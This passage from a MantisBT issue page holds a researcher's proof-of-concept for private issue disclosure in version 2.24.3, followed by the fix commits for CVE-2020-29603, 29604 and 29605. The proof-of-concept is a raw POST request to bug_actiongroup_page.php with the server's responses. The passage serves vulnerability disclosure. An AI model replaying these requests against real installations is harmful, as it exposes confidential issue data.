http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 ``` - we finally leaked the full information of a private issue ! ### It's too late The following function allows me to disclose the title this stuffs can be found on ``bug_actiongroup_page.php`` **This is the overall request they are just different action value** ``` POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 43 Origin: http://localhost Connection: close Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312 Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8 Upgrade-Insecure-Requests: 1 bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION ``` The title for this section is too late because they don't allow the certain functionality but they already leaked the summary - move issues returns ``You did not have appropriate permissions to perform that action.`` - assign issues returns ``You did not have appropriate permissions to perform that action.`` - close issue returns ``You did not have appropriate permissions to perform that action.`` - delete issue returns ``You did not have appropriate permissions to perform that action.`` - resolve issues returns ``You did not have appropriate permissions to perform that action.`` - set sticky return ``You did not have appropriate permissions to perform that action.`` - update priority returns ``You did not have appropriate permissions to perform that action.`` - update severity returns ``Access Denied.`` - update status returns ``You did not have appropriate permissions to perform that action.`` - update view returns ``You did not have appropriate permissions to perform that action.`` - add note returns ``Access Denied.`` - attach tags returns ``Attach permission denied.`` |
|
MantisBT: master cff10f26 2020-12-06 07:39 Details Diff |
Avoid private project name disclosure When an unprivileged user tries to access a private project via manage_proj_edit_page.php, they receive an Access Denied as expected, but the project's name is leaked via the navbar's project selector. Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting and providing an initial patch for this bug. Fixes 0027726, 0027357, CVE-2020-29603 |
Affected Issues 0027357, 0027726 |
|
mod - core/layout_api.php | Diff File | ||
MantisBT: master 12a9dcbb 2020-12-06 13:08 Details Diff |
Prevent disclosure of private issue summary Insufficient access level checks allowed an attacker to display private issues' summary via Group Actions (bug_actiongroup_page.php). Going through the provided list of issue IDs (bug_arr[]) and removing any issues the user does not have access to, fixes the vulnerability. Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting the issue. Fixes 0027727, 0027357, CVE-2020-29605 |
Affected Issues 0027357, 0027727 |
|
mod - bug_actiongroup_page.php | Diff File | ||
MantisBT: master b2da7352 2020-12-06 13:43 Details Diff |
Prevent full private issue disclosure Missing access check in bug_actiongroup.php allows an attacker with rights to create new issues to use the COPY group action to create a clone of any private issue (including all bugnotes and attachments), thus gaining full access to potentially confidential information. Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting the issue. Fixes 0027728, 0027357, CVE-2020-29604 |
Affected Issues 0027357, 0027728 |
|
mod - bug_actiongroup.php | Diff File |